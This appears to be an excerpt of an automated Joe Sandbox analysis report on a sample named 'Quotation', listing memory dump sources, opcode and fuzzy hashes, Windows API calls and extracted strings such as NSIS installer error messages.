                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6cc7131a2dd9138fdd53ad86ac5efc3cd83c9ae2880141b24b5cd22a39dfee9d
                                                                • Instruction ID: 63dbac2332f6eb17d6b9fd8679422d0baca36638e986785c0ce8f90ee132fd8b
                                                                • Opcode Fuzzy Hash: 6cc7131a2dd9138fdd53ad86ac5efc3cd83c9ae2880141b24b5cd22a39dfee9d
                                                                • Instruction Fuzzy Hash: 7D01B135B101101FDB26AA3DC860A1B77DADBCA610F258439E60ACB381DA25DC074399
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5e71961da2713ad08ab0c6d1ccd98eb96ad67d2214a545d68a1210f587abf5bb
                                                                • Instruction ID: 9535846d62709dc5eec42d72d6a2afa895581c94b2ae5e1c4bf4cea734946de4
                                                                • Opcode Fuzzy Hash: 5e71961da2713ad08ab0c6d1ccd98eb96ad67d2214a545d68a1210f587abf5bb
                                                                • Instruction Fuzzy Hash: 3F01F536B000244BEF448679CC142AFB3EADBC4A40F26403AD50AD3A40EF65880787D1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268283062.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_ad000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 03eaf8a4334ce06a06af18b89caff828b05e34beddbd90a58a88570bb971307e
                                                                • Instruction ID: e775f831a3e969edde72d8c286b228eb83e4ee07c68033b536d292936b2b893b
                                                                • Opcode Fuzzy Hash: 03eaf8a4334ce06a06af18b89caff828b05e34beddbd90a58a88570bb971307e
                                                                • Instruction Fuzzy Hash: E211D075504244DFCB11CF50C5C4B15BFA1FB49314F24CAAED94A4B652C33AD84ACF62
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f9db5d63f80575caa2f48adcb76a527d5ffe620b1f6778339bafba589e5a2421
                                                                • Instruction ID: 885a536087ea72c3b675e4a57843722aca17685a2620d3ec87618aa5b4e77d31
                                                                • Opcode Fuzzy Hash: f9db5d63f80575caa2f48adcb76a527d5ffe620b1f6778339bafba589e5a2421
                                                                • Instruction Fuzzy Hash: D0016D31A00214DFCF26EFB884512AE7BE5EB49312B25047AEC16EB301E735D9458BA1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f6845685e69272fc9addc19c4644f883d485f0084b582b247e2e8fbf22327d6
                                                                • Instruction ID: 47fb152715ab438ce6806889b69798b730ccb46f8384f39108573c8246b4e630
                                                                • Opcode Fuzzy Hash: 1f6845685e69272fc9addc19c4644f883d485f0084b582b247e2e8fbf22327d6
                                                                • Instruction Fuzzy Hash: 0801DF35B500204FEB15D768D97475E7BD2DB8A754F25882AE20EDB751DA21CC038786
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1fb0ae3b8161240614143b4ea4faf8edf90b6d816ae1b86ffe696fc1c8d15579
                                                                • Instruction ID: 9cb753e9b36d80b82a5668af5db11994f258a97964687d96fcc85e027692604f
                                                                • Opcode Fuzzy Hash: 1fb0ae3b8161240614143b4ea4faf8edf90b6d816ae1b86ffe696fc1c8d15579
                                                                • Instruction Fuzzy Hash: EB11D3B5D01259AFCB00CF9AD984ADEFBB4FF49310F50812AE918A7700D3746554CFA5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: edd58bc1487d0ae109d3ed5c83010cd3ab9e2ce6fcd6360fef946c221140d6a4
                                                                • Instruction ID: 03deac1a40ad10bbc97a6c19e4ac0c10465134d20d44f31b35b47342b6872d06
                                                                • Opcode Fuzzy Hash: edd58bc1487d0ae109d3ed5c83010cd3ab9e2ce6fcd6360fef946c221140d6a4
                                                                • Instruction Fuzzy Hash: B8018639B400100BEB14A66FD424B5FA6DBDBC5750F21853AE20ED7764DA65DC034796
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26e6403042c718f71de2afaf5a0d507d09e57552bdf219936c4d5c7a2ff67f36
                                                                • Instruction ID: 6bbd8ba185097e6df79240c27c535ce9ecc60bba1623d642ac42056c224a735a
                                                                • Opcode Fuzzy Hash: 26e6403042c718f71de2afaf5a0d507d09e57552bdf219936c4d5c7a2ff67f36
                                                                • Instruction Fuzzy Hash: FF018C39B200101BEB25AA3DC454B2F77DBDBCA650F218839E20ACB740DE25DC034389
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dba6e4bc5c405b475a8fb4f856c3fd26a46f778bffc37903453dc5fba49ae136
                                                                • Instruction ID: 75112185e40ca5cf93639e1030f19ae6c10fdb64be7e91a65ddb240d531682bc
                                                                • Opcode Fuzzy Hash: dba6e4bc5c405b475a8fb4f856c3fd26a46f778bffc37903453dc5fba49ae136
                                                                • Instruction Fuzzy Hash: F5018C38B100244FEB14DBA8D464B1F77D6DB8AB64F218939E20ED7750EE62DC038789
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb914bf2deac034f36ac143d9027d8c0a5dcf7327153d9762eb7ae724d5c23d6
                                                                • Instruction ID: 16bf54f9f4e45d647ce0052789ff8ef5c00bdc6f319d0179973a5c1fbf2898e4
                                                                • Opcode Fuzzy Hash: cb914bf2deac034f36ac143d9027d8c0a5dcf7327153d9762eb7ae724d5c23d6
                                                                • Instruction Fuzzy Hash: 4501F435F102249BDF189A79E891A897B79FB86354F10453DEA00EB341DB32EC098BC4
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da8d3f86421d61e83b73b2909b93ad3401f0e91cf4a86e788de856146742b569
                                                                • Instruction ID: 249a4499b2e864b8b8ae82a6bd6495414a7155b1ca2d9a93702192cee1299105
                                                                • Opcode Fuzzy Hash: da8d3f86421d61e83b73b2909b93ad3401f0e91cf4a86e788de856146742b569
                                                                • Instruction Fuzzy Hash: B1F097317C42048FCB082ABC4820A6B2FAEFFC2340B12017AE601CF299EE958C0743F1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6b53e26f92c3c659a9f90e4bd97e0a4e00a555b0ea760c90202b5658de840df
                                                                • Instruction ID: 4ca0d63ddd7e8b9c71a341601ec7033c39329ae62f205bc38dabf1a0cc8700c7
                                                                • Opcode Fuzzy Hash: f6b53e26f92c3c659a9f90e4bd97e0a4e00a555b0ea760c90202b5658de840df
                                                                • Instruction Fuzzy Hash: 19F0E5207C01049BC60826AD9965B7F2BDEFFC5791F11483AEB06DB258EE58DC0B53E1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 886aee143f6576d77e34324fc13fd226fc73a7f1a24349880f5ee712ac4c6b0c
                                                                • Instruction ID: 77e8bf2dc6a0efa50f4412db8d0c580c18e7b2987bcd6589d978b83461853114
                                                                • Opcode Fuzzy Hash: 886aee143f6576d77e34324fc13fd226fc73a7f1a24349880f5ee712ac4c6b0c
                                                                • Instruction Fuzzy Hash: 9CF01439B40204CFCB04DB68D998A6C73B2EF88315F5040A8E5069B3A0CB30AD42CB41
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5097023499777c61289f8ca4fc3c1ff8feb55f22bc1216d4f997f0ec66c0ed97
                                                                • Instruction ID: bb45fa0a9e90a4696c2d3b0e1c1d4b9e7da7b5c270e4b0d1969f621e97323e81
                                                                • Opcode Fuzzy Hash: 5097023499777c61289f8ca4fc3c1ff8feb55f22bc1216d4f997f0ec66c0ed97
                                                                • Instruction Fuzzy Hash: 2DE04F71E64288ABEF01CF74C90976B76ACD702244F6289F5D604CB652F276DE118751
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9015c47ef9cef9a1e975b950050731352a5cf3b9ce04cb211218acfea42ae399
                                                                • Instruction ID: 3148d29ca81a91485d71692166a194ac77ac71c636f62ee99450a71e01eb39e8
                                                                • Opcode Fuzzy Hash: 9015c47ef9cef9a1e975b950050731352a5cf3b9ce04cb211218acfea42ae399
                                                                • Instruction Fuzzy Hash: 42D02B21E087085FE32D921CA80871337EE9709350F454056E91ACB382D7509D0543D0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e352f056c1d45ef6dd97e84704ac796c81c8c4a10b6b42172138bd2a14031928
                                                                • Instruction ID: cf3f65a1e94802ec41b37652255ca3f3446ac23007653e0b0abd66248cab7814
                                                                • Opcode Fuzzy Hash: e352f056c1d45ef6dd97e84704ac796c81c8c4a10b6b42172138bd2a14031928
                                                                • Instruction Fuzzy Hash: B7D05E34A05714DBC32CDA59D144653B7EABB48715B854419E45687A40C760FD0587C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,FI6$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$FI6
                                                                • API String ID: 0-4249346219
                                                                • Opcode ID: 6680e5f6307f8f3eb5e2be58cd364bf869fe1de8c7b7527fcd72941c5a7a93bc
                                                                • Instruction ID: 3045c2e3692aab9a0d4450d631998583efb48e40a4751668a7b190410942b134
                                                                • Opcode Fuzzy Hash: 6680e5f6307f8f3eb5e2be58cd364bf869fe1de8c7b7527fcd72941c5a7a93bc
                                                                • Instruction Fuzzy Hash: 16123B34E00219CFDB18DF69C894A9EB7F2BF88304F21856AD509AB665DB349D46CF81
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00008001), ref: 004036F6
                                                                • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268561346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3268546978.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000003.00000002.3268577399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000003.00000002.3268592200.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000003.00000002.3268697879.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: ErrorModeVersion
                                                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$NSIS Error$UXTHEME
                                                                • API String ID: 3050056751-1170945346
                                                                • Opcode ID: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                • Instruction ID: 04f03ee53333af138268126fb18566c4da9f6100b8f71d1fbc27ece8fdb1561f
                                                                • Opcode Fuzzy Hash: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                • Instruction Fuzzy Hash: CF3104B0504350AFD310AF659D95BBB3AE8EB85305F40443FF8C6BB2C1DA7C89448B6A
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                • wsprintfW.USER32 ref: 004061CF
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268561346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3268546978.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000003.00000002.3268577399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000003.00000002.3268592200.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000003.00000002.3268697879.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                • API String ID: 2200240437-1946221925
                                                                • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-1273862796
                                                                • Opcode ID: d40a1367b240a6f05b409a993daf3962e93c4dbe5cdd0e30d0ba796d7086595e
                                                                • Instruction ID: b00577a7a8bafcbdfa50e45f825f45a8a5749fe1bd3a5df3394ddac9d7381861
                                                                • Opcode Fuzzy Hash: d40a1367b240a6f05b409a993daf3962e93c4dbe5cdd0e30d0ba796d7086595e
                                                                • Instruction Fuzzy Hash: F191C034A00229DFEF18EF65C594B6E7BF2FF84304F258529E941AB650DBB89C45CB80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-981061697
                                                                • Opcode ID: d1a025156d6d199b9a80c7cfcd1ad5e1e299a86031cb65f11444abfd67536b98
                                                                • Instruction ID: f5a23d1ac4c8985529eeab80556e2800a5a88a19bf5d924537687d0ce7d57cdd
                                                                • Opcode Fuzzy Hash: d1a025156d6d199b9a80c7cfcd1ad5e1e299a86031cb65f11444abfd67536b98
                                                                • Instruction Fuzzy Hash: FFF16C34A00204CFDB09DFA9D5A4A5EBBB6FF88340F218528E815AB765DB35DC46CB84
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                  • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                  • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                  • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268561346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3268546978.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000003.00000002.3268577399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000003.00000002.3268592200.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000003.00000002.3268697879.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                • API String ID: 2547128583-890815371
                                                                • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q
                                                                • API String ID: 0-858218434
                                                                • Opcode ID: 9a5ec0873563fe2fd2a868cdf28afb7190130d81780c46c2dc56bef242221910
                                                                • Instruction ID: 15029175aea011f760d66c022bc447f0303bc3c2221cb6f5ddd4c1dfa644a41c
                                                                • Opcode Fuzzy Hash: 9a5ec0873563fe2fd2a868cdf28afb7190130d81780c46c2dc56bef242221910
                                                                • Instruction Fuzzy Hash: E7B18D34E00218CFDB18DFA5D490A9EBBB6FF88344F218929D5069B755DB35DC86CB81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DRI6$XM$XM$TI6
                                                                • API String ID: 0-2294773779
                                                                • Opcode ID: ce41ac662e635512aa38839c2d9cf9a63941f1cf5a311be1b59d922f986f195d
                                                                • Instruction ID: 2d638bf02c8ddf78d629236d6c0a2ae31a6b63de26259fb602cc75f4b4770d3e
                                                                • Opcode Fuzzy Hash: ce41ac662e635512aa38839c2d9cf9a63941f1cf5a311be1b59d922f986f195d
                                                                • Instruction Fuzzy Hash: F3A15B34B002198FDB54DB74C89079EB7B2EF89304F2086A9D509AB355DB35DD46CB92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR]q$LR]q$$]q$$]q
                                                                • API String ID: 0-3527005858
                                                                • Opcode ID: 7e5c633ef34997b1d9a5d145418fa4dc659550c80efec9b5bf501cb2651b6082
                                                                • Instruction ID: 8c590efe3682686eaf21a919bbf8778671d14b033e17760efbd2bb539200da73
                                                                • Opcode Fuzzy Hash: 7e5c633ef34997b1d9a5d145418fa4dc659550c80efec9b5bf501cb2651b6082
                                                                • Instruction Fuzzy Hash: A351C134B002199FDF08DB28C890A5A77F6FF89704F118569E505AB7A5DB30EC06CB96
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (\I6$(\I6$$]q$$]q
                                                                • API String ID: 0-1576202101
                                                                • Opcode ID: b6d043412aad3cf86928fd3243fb1164930f872d3e3ada18a903555d3a9710d9
                                                                • Instruction ID: c51a881a53971670a1008ab7c17d472bc656e6ba4b2129218527d74c2e7f0f04
                                                                • Opcode Fuzzy Hash: b6d043412aad3cf86928fd3243fb1164930f872d3e3ada18a903555d3a9710d9
                                                                • Instruction Fuzzy Hash: 4A416C34E00319CFEF14CFA4D5A09ADB7B2FF85304B22855AEA45AB650DB70ED42CB85